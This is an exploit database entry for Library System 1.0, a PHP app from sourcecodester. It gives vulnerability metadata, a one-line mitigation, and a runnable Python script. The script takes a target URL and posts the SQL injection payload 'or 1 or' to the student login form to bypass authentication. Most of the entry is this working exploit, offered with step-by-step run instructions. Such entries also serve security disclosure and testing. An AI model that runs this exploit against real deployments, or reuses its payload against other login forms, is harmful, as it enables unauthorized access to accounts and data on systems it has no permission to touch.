Library System 1.0 - Authentication Bypass Via SQL Injection

vendor:

Library System

by:

Himanshu Shukla

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Library System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:library_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 + XAMPP 7.4.4

2021

Library System 1.0 – Authentication Bypass Via SQL Injection

Library System 1.0 is vulnerable to authentication bypass via SQL injection. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the application. This will allow the attacker to bypass the authentication and gain access to the student area.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection
#STEP 1 : Run The Exploit With This Command : python3 exploit.py
#STEP 2 : Input the URL of Vulnable Application.  For Example: http://10.9.67.23/libsystem/
#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser. 

#Note - You Will Only Be Able To Access The Student Area as a Privileged User.

import requests
YELLOW =  '\033[33m' # Yellow Text
GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults

print(YELLOW+'      _          ______  _               _  ___           ', RESET)
print(YELLOW+'  ___| |_ ___   / / ___|| |__   __ _  __| |/ _ \__      __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'|  __/ || (__ / /  ___) | | | | (_| | (_| | |_| |\ V  V / ', RESET)
print(YELLOW+' \___|\__\___/_/  |____/|_| |_|\__,_|\__,_|\___/  \_/\_/  ', RESET)
print(YELLOW+" ", RESET)                                                          
print('********************************************************')
print('**                  LIBRARY SYSTEM 1.0                **')
print('**     AUTHENTICATION BYPASS USING SQL INJECTION      **')
print('********************************************************')

print('Author - Himanshu Shukla')


#Create a new session

s = requests.Session() 
  
#Set Cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}

LINK=input("Enter URL of The Vulnarable Application : ")

#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"student":"'or 1 or'","login":""}
r=s.post(LINK+'login.php', data=values, cookies=cookies) 

r=s.post(LINK+'login.php', data=values, cookies=cookies) 

#Check if Authentication was bypassed or not.
logged_in = True if not("Student not found" in r.text) else False
l=logged_in
if l:
	print(GREEN+"[+]Authentication Bypass Successful!", RESET)
	print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
else:
	print(RED+"[-]Failed To Authenticate!", RESET)